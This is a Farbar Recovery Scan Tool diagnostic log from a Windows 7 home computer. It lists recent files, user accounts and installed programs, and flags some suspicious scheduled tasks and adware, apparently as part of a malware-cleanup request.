2022-03-29 17:33 - 2022-03-29 15:21 - 015274968 _____ (ESET) C:\Users\Marilyn\Desktop\esetonlinescanner.exe
2022-03-29 17:30 - 2022-03-29 17:30 - 000000000 ____D C:\Users\Marilyn\AppData\Local\ESET
2022-03-29 17:29 - 2022-03-29 17:29 - 000003448 _____ C:\Windows\system32\Tasks\Mysa1
2022-03-29 17:29 - 2022-03-29 17:29 - 000003444 _____ C:\Windows\system32\Tasks\ok
2022-03-29 17:29 - 2022-03-29 17:29 - 000003342 _____ C:\Windows\system32\Tasks\oka
2022-03-29 14:54 - 2022-03-29 14:54 - 000001908 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2022-03-29 14:50 - 2022-03-29 19:40 - 000000346 _____ C:\Windows\Tasks\EOSv3 Scheduler onTime.job
2022-03-29 14:50 - 2022-03-29 19:40 - 000000346 _____ C:\Windows\Tasks\EOSv3 Scheduler onLogOn.job
2022-03-29 12:58 - 2022-03-29 12:58 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\ESET
2022-03-29 12:55 - 2022-03-29 12:55 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\ElevatedDiagnostics
2022-03-29 12:48 - 2022-03-29 12:48 - 000000000 ____D C:\Program Files\Kodi
2022-03-29 12:31 - 2022-03-29 12:44 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\_
2022-03-29 12:07 - 2022-03-29 12:07 - 000113928 _____ C:\Users\Administrator.Marilyn-HP\AppData\Local\GDIPFONTCACHEV1.DAT
2022-03-29 11:29 - 2022-03-29 11:29 - 000000000 ____D C:\Users\Marilyn\AppData\Local\_
2022-03-29 11:03 - 2022-03-29 11:59 - 000002684 _____ C:\Users\Marilyn\Desktop\Rkill.txt
2022-03-28 22:49 - 2022-03-28 22:49 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Apple Computer
2022-03-28 22:49 - 2022-03-28 22:49 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\BraveSoftware
2022-03-28 22:48 - 2022-03-28 22:47 - 000069040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2022-03-28 21:56 - 2022-03-29 17:29 - 000003330 _____ C:\Windows\system32\Tasks\MicrosoftsWindowsy
2022-03-28 21:55 - 2022-03-28 21:55 - 000000008 __RSH C:\ProgramData\ntuser.pol
2022-03-28 21:48 - 2022-03-28 21:58 - 000070396 _____ C:\Users\Marilyn\Desktop\Fixlog.txt
2022-03-28 17:49 - 2022-03-28 17:49 - 000002323 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2022-03-28 17:49 - 2022-03-28 17:49 - 000002282 _____ C:\Users\Public\Desktop\Brave.lnk
2022-03-28 17:48 - 2022-03-28 17:48 - 000003342 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineUA
2022-03-28 17:48 - 2022-03-28 17:48 - 000003214 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineCore
2022-03-28 17:48 - 2022-03-28 17:48 - 000000000 ____D C:\Program Files\BraveSoftware
2022-03-28 17:48 - 2022-03-28 17:48 - 000000000 ____D C:\Program Files (x86)\BraveSoftware
2022-03-28 17:47 - 2022-03-28 17:49 - 000000000 ____D C:\Users\Marilyn\AppData\Local\BraveSoftware
2022-03-28 16:08 - 2022-03-28 16:08 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\mbam
2022-03-28 16:03 - 2022-03-28 16:03 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\McAfee File Lock
2022-03-28 12:59 - 2022-03-29 15:59 - 000248992 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2022-03-28 12:59 - 2022-03-29 15:06 - 000220568 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2022-03-28 12:59 - 2022-03-29 14:54 - 000001920 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2022-03-28 12:59 - 2022-03-28 12:59 - 000000000 ____D C:\Users\Marilyn\AppData\Local\mbam
2022-03-28 12:57 - 2022-03-28 12:57 - 000000000 ____D C:\Users\Marilyn\AppData\Local\McAfee File Lock
2022-03-28 12:32 - 2022-03-28 23:00 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Everything
2022-03-28 12:32 - 2022-03-28 23:00 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\Everything
2022-03-28 12:25 - 2022-03-28 12:25 - 000001373 _____ C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2022-03-28 12:25 - 2022-03-28 12:25 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Adobe
2022-03-28 12:24 - 2022-03-28 13:39 - 000000000 ____D C:\Users\Administrator.Marilyn-HP
2022-03-28 12:24 - 2022-03-28 12:24 - 000000020 ___SH C:\Users\Administrator.Marilyn-HP\ntuser.ini
2022-03-28 12:24 - 2010-12-10 12:47 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\Microsoft Help
2022-03-28 12:24 - 2010-07-08 05:18 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Media Center Programs
2022-03-28 12:04 - 2022-03-28 12:03 - 000160176 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2022-03-28 11:55 - 2022-03-28 11:55 - 000023552 ___SH C:\Users\Marilyn\Downloads\Thumbs.db
2022-03-28 11:52 - 2022-03-28 11:52 - 000000000 ____D C:\Users\Marilyn\Downloads\2019-09 Security Update for Windows 7 for x64-based Systems (KB4474419)
2022-03-28 11:32 - 2022-03-29 19:42 - 000000000 ____D C:\FRST
2022-03-28 11:26 - 2022-03-28 11:15 - 202117816 _____ (Malwarebytes) C:\Users\Administrator.Marilyn-HP\Desktop\MBSetup-0076911.0076911-4.5.2.157.exe
2022-03-28 11:03 - 2022-03-28 12:02 - 000000000 ____D C:\Program Files\Malwarebytes
2022-03-28 10:57 - 2022-03-28 10:55 - 002365440 _____ (Farbar) C:\Users\Marilyn\Desktop\FRST64.exe
2022-03-28 10:48 - 2022-03-28 10:49 - 000000000 ____D C:\AdwCleaner
2022-03-28 10:48 - 2022-03-28 10:45 - 008540344 _____ (Malwarebytes) C:\Users\Marilyn\Desktop\adwcleaner_8.3.1.exe
2022-03-27 16:18 - 2022-03-27 16:18 - 000000000 ____D C:\Quarantine
2022-03-27 15:13 - 2022-03-29 17:30 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Everything
2022-03-27 13:27 - 2022-03-29 17:30 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Everything
2022-03-27 13:27 - 2022-03-27 13:27 - 000000953 _____ C:\Users\Marilyn\Desktop\Search Everything.lnk
2022-03-27 13:27 - 2022-03-27 13:27 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Everything
2022-03-27 13:27 - 2022-03-27 13:27 - 000000000 ____D C:\Program Files\Everything
2022-03-27 12:51 - 2022-03-27 12:51 - 000000207 _____ C:\Windows\tweaking.com-regbackup-MARILYN-HP-Windows-7-Home-Premium-(64-bit).dat
2022-03-27 12:47 - 2022-03-27 12:48 - 000389123 _____ C:\Windows\Tweaking.com - Windows Repair Setup Log.txt
2022-03-25 16:32 - 2022-03-29 12:56 - 000000000 ____D C:\EEK
2022-03-25 12:42 - 2022-03-29 17:32 - 002035790 _____ C:\Windows\ntbtlog.txt
2022-03-25 12:33 - 2022-03-25 12:33 - 000000000 ____D C:\Users\Marilyn\Desktop\Microsoft Offline Safety Scanner
2022-03-25 12:09 - 2022-03-25 12:09 - 037889344 _____ (Piriform Software Ltd) C:\Users\Marilyn\Downloads\ccsetup591.exe
2022-03-24 11:39 - 2022-03-24 11:36 - 004146112 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\avgremoverx.exe
2022-03-24 09:51 - 2022-03-28 12:59 - 000000000 ____D C:\Users\Marilyn\AppData\LocalLow\Mozilla
2022-03-24 09:51 - 2022-03-24 09:51 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Mozilla
2022-03-24 09:02 - 2022-03-24 09:02 - 000000000 _____ C:\Users\Marilyn\AppData\Local\{34ACB9DF-E53F-41D3-8944-3B60681EB5DC}
2022-03-22 13:57 - 2022-03-24 10:52 - 000007604 _____ C:\Users\Marilyn\AppData\Local\Resmon.ResmonCfg
2022-03-22 11:46 - 2022-03-22 11:49 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Geek Uninstaller
2022-03-17 09:51 - 2022-03-17 09:51 - 000113928 _____ C:\Users\Guest\AppData\Local\GDIPFONTCACHEV1.DAT
2022-03-17 09:47 - 2022-03-17 10:02 - 000000000 ____D C:\Users\Guest\AppData\Local\Backup Assistant Plus
2022-03-08 08:38 - 2022-03-28 18:24 - 000000000 ____D C:\Windows\pss
2022-02-27 12:39 - 2022-02-27 12:44 - 002998689 _____ C:\Users\Marilyn\Desktop\tAX_1.heic
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-03-29 17:35 - 2009-07-14 01:13 - 000772352 _____ C:\Windows\system32\PerfStringBackup.INI
2022-03-29 17:35 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\inf
2022-03-29 17:30 - 2021-11-22 12:27 - 000236470 _____ C:\Windows\system32\prfh0814.dat
2022-03-29 17:30 - 2009-07-14 00:45 - 000023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2022-03-29 17:30 - 2009-07-14 00:45 - 000023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2022-03-29 17:29 - 2013-04-29 09:52 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Backup Assistant Plus
2022-03-29 17:27 - 2009-07-14 01:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-03-29 12:01 - 2021-10-04 20:06 - 000023270 _____ C:\Users\Public\service.txt
2022-03-29 12:01 - 2021-10-04 20:05 - 000010220 _____ C:\Users\Public\processa.txt
2022-03-29 12:01 - 2021-10-04 20:05 - 000004040 _____ C:\Users\Public\datea.txt
2022-03-29 10:52 - 2010-12-06 10:58 - 000003942 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{AB8AAEEB-E020-4223-9761-6466B42DE5D3}
2022-03-28 22:45 - 2010-11-27 18:03 - 000000000 ____D C:\Users\Marilyn
2022-03-28 21:49 - 2012-06-22 10:29 - 000000000 ____D C:\Users\Marilyn\AppData\LocalLow\Temp
2022-03-28 21:48 - 2009-07-13 23:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2022-03-28 21:48 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\SysWOW64\GroupPolicy
2022-03-28 17:34 - 2010-07-10 23:21 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Online Services
2022-03-28 17:25 - 2010-07-10 23:01 - 000000000 ____D C:\ProgramData\Temp
2022-03-28 15:45 - 2009-07-14 01:08 - 000032604 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2022-03-28 14:15 - 2010-07-10 22:01 - 000000000 ____D C:\Program Files (x86)\Hewlett-Packard
2022-03-28 14:09 - 2017-01-03 10:56 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\HP Photo Creations
2022-03-28 13:39 - 2014-03-02 10:37 - 000000000 ____D C:\Users\Jay
2022-03-28 13:39 - 2012-05-27 10:54 - 000000000 ____D C:\Users\Guest
2022-03-28 13:39 - 2012-01-25 11:27 - 000000000 ____D C:\Users\lindag
2022-03-28 13:38 - 2012-06-22 10:29 - 000000000 ____D C:\Program Files (x86)\Conduit
2022-03-28 13:37 - 2014-03-22 13:25 - 000000000 ____D C:\Users\Marilyn\AppData\Local\VisualBeeExe
2022-03-28 12:43 - 2017-01-27 10:00 - 000000000 ____D C:\Program Files\Common Files\AV
2022-03-28 12:35 - 2017-01-27 14:05 - 000000000 ____D C:\Program Files\McAfee
2022-03-28 12:25 - 2009-07-14 00:57 - 000001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2022-03-28 12:08 - 2009-07-14 01:09 - 000000000 ____D C:\Windows\system32\Tasks\WPD
2022-03-28 12:02 - 2012-11-24 12:03 - 000000000 ____D C:\ProgramData\Malwarebytes
2022-03-28 12:00 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\SysWOW64\Dism
2022-03-28 12:00 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\system32\Dism
2022-03-28 11:51 - 2009-07-14 01:32 - 000000000 ____D C:\Windows\Downloaded Program Files
2022-03-28 11:27 - 2010-11-27 18:29 - 000113928 _____ C:\Users\Marilyn\AppData\Local\GDIPFONTCACHEV1.DAT
2022-03-27 23:53 - 2012-01-29 15:39 - 000000000 ____D C:\Program Files (x86)\Coupons
2022-03-27 13:09 - 2009-07-14 00:45 - 000422688 _____ C:\Windows\system32\FNTCACHE.DAT
2022-03-27 13:04 - 2018-03-26 20:08 - 000000000 ____D C:\Users\Marilyn\Downloads\- ma caregiver affidavit form(1).pdf_files
2022-03-27 13:04 - 2009-07-13 22:34 - 000000616 _____ C:\Windows\win.ini
2022-03-27 13:01 - 2016-12-18 20:13 - 000782336 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2022-03-26 15:25 - 2009-07-13 22:34 - 000000062 _____ C:\Windows\system32\Drivers\etc\hosts_bak_383
2022-03-25 12:19 - 2009-09-06 21:57 - 000000000 ____D C:\Windows\Panther
2022-03-25 12:18 - 2014-12-02 22:17 - 000000000 ____D C:\Windows\Minidump
2022-03-25 12:18 - 2011-05-07 11:12 - 000000000 ____D C:\Users\Marilyn\AppData\Local\CrashDumps
2022-03-24 11:27 - 2012-11-26 12:13 - 000000000 ____D C:\Users\Marilyn\AppData\Local\ElevatedDiagnostics
2022-03-24 09:51 - 2017-03-29 10:21 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Mozilla
2022-03-24 09:49 - 2011-08-22 18:44 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Google
2022-03-24 09:49 - 2011-08-22 18:44 - 000000000 ____D C:\Program Files (x86)\Google
2022-03-24 09:49 - 2010-11-28 12:44 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Adobe
2022-03-22 13:52 - 2011-11-29 10:58 - 000000000 ____D C:\Windows\system32\Macromed
2022-03-22 13:50 - 2010-07-10 22:29 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2022-03-22 13:48 - 2010-07-10 22:01 - 000000000 ____D C:\Program Files\Hewlett-Packard
2022-03-22 13:44 - 2010-07-10 22:03 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2022-03-08 08:52 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\system32\NDF
2022-03-06 18:32 - 2010-11-27 18:38 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Hewlett-Packard
==================== Files in the root of some directories ========
2014-08-18 09:25 - 2014-08-18 09:25 - 000000004 _____ () C:\Users\Marilyn\AppData\Roaming\2873252659
2014-08-18 09:25 - 2014-08-18 09:26 - 003133211 _____ () C:\Users\Marilyn\AppData\Roaming\3104970040
2013-12-09 18:41 - 2013-12-09 18:41 - 004889600 _____ () C:\Users\Marilyn\AppData\Roaming\IHAMC.msi
2014-03-22 13:53 - 2014-07-19 09:20 - 000000088 _____ () C:\Users\Marilyn\AppData\Roaming\WB.CFG
2013-05-03 21:28 - 2013-05-03 21:28 - 000003584 _____ () C:\Users\Marilyn\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-12-31 11:10 - 2018-12-31 11:10 - 000000542 _____ () C:\Users\Marilyn\AppData\Local\LMIR088D0001.tmp_r.bat
2022-03-22 13:57 - 2022-03-24 10:52 - 000007604 _____ () C:\Users\Marilyn\AppData\Local\Resmon.ResmonCfg
2022-03-24 09:02 - 2022-03-24 09:02 - 000000000 _____ () C:\Users\Marilyn\AppData\Local\{34ACB9DF-E53F-41D3-8944-3B60681EB5DC}
2021-10-04 18:57 - 2021-10-04 18:57 - 000000000 _____ () C:\Users\Marilyn\AppData\Local\{DAD70E7C-C7B4-47F7-87CE-76E4F783B327}
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-03-2022
Ran by Marilyn (29-03-2022 19:44:20)
Running from C:\Users\Marilyn\Desktop
Microsoft Windows 7 Home Premium Service Pack 1 (X64) (2010-11-27 22:03:47)
Boot Mode: Safe Mode (with Networking)
==========================================================
==================== Accounts: =============================
(If an entry is included in the fixlist, it will be removed.)
Administrator (S-1-5-21-1250379553-2428740185-3603661230-500 - Administrator - Enabled) => C:\Users\Administrator.Marilyn-HP
Guest (S-1-5-21-1250379553-2428740185-3603661230-501 - Limited - Enabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-1250379553-2428740185-3603661230-1002 - Limited - Enabled)
Jay (S-1-5-21-1250379553-2428740185-3603661230-1004 - Limited - Enabled) => C:\Users\Jay
Marilyn (S-1-5-21-1250379553-2428740185-3603661230-1000 - Administrator - Enabled) => C:\Users\Marilyn
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\{9ECF7817-DB11-4FBA-9DF1-296A578D513A}) (Version: 11.5.7.609 - Adobe Systems, Inc)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{7446FE8D-C1F9-4D42-AAAE-5DBCE58605A6}) (Version: 6.0.0.59 - Apple Inc.)
Ask Toolbar Updater (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.5.36191 - Ask.com) <==== ATTENTION
Ask Toolbar Updater (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.1.22229 - Ask.com) <==== ATTENTION
Bing Rewards Client Installer (HKLM-x32\...\{61EDBE71-5D3E-4AB7-AD95-E53FEAF68C17}) (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Brave (HKLM-x32\...\BraveSoftware Brave-Browser) (Version: 99.1.36.122 - Brave Software Inc)
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3003 - CyberLink Corp.)
CyberLink MediaShow (HKLM-x32\...\InstallShield_{80E158EA-7181-40FE-A701-301CE6BE64AB}) (Version: 5.0.1616 - CyberLink Corp.)
CyberLink PowerDVD 9 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.0.1.4217 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.2511 - CyberLink Corp.)
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
Everything 1.4.1.935 (x64) (HKLM\...\Everything) (Version: 1.4.1.935 - David Carpenter)
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP Photo Creations (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\HP Photo Creations) (Version: 1.0.0.22192 - HP)
HP Photo Creations (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\HP Photo Creations) (Version: 1.0.0.22192 - HP)
HP Power Manager (HKLM-x32\...\{4B156358-CE9C-4E9F-8CAD-79AE86A68C60}) (Version: 1.0.3 - Hewlett-Packard Company)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{8E5233E1-7495-44FB-8DEB-4BE906D59619}) (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.)
Malwarebytes version 4.5.2.157 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.5.2.157 - Malwarebytes)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.10411.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022.218 (HKLM-x32\...\{E503B4BF-F7BB-3D5F-8BC8-F694B1CFF942}) (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.40820 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoNow! (HKLM-x32\...\{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.)
PowerDirector (HKLM-x32\...\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.)
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.18.322.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Software (HKLM-x32\...\{901F0D4C-009D-1112-8DE4-03599E7B0C5C}) (Version: 1.00.10.0329 - REALTEK Semiconductor Corp.)
Recovery Manager (HKLM-x32\...\{44B2A0AB-412E-4F8C-B058-D1E8AECCDFF5}) (Version: 5.5.3023 - CyberLink Corp.) Hidden
Savings Bond Wizard (HKLM-x32\...\{566DBD89-9955-4024-9384-A6301C8C6584}) (Version: 4.15 - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.1.6.64 - Synaptics Incorporated)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Verizon Cloud (HKLM-x32\...\Verizon Cloud) (Version: 4.1.0 - Verizon Wireless)
VisualBee for Microsoft PowerPoint (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\VisualBee for Microsoft PowerPoint) (Version: V4.1 - VisualBee.com)
VisualBee for Microsoft PowerPoint (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\VisualBee for Microsoft PowerPoint) (Version: V4.1 - VisualBee.com)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
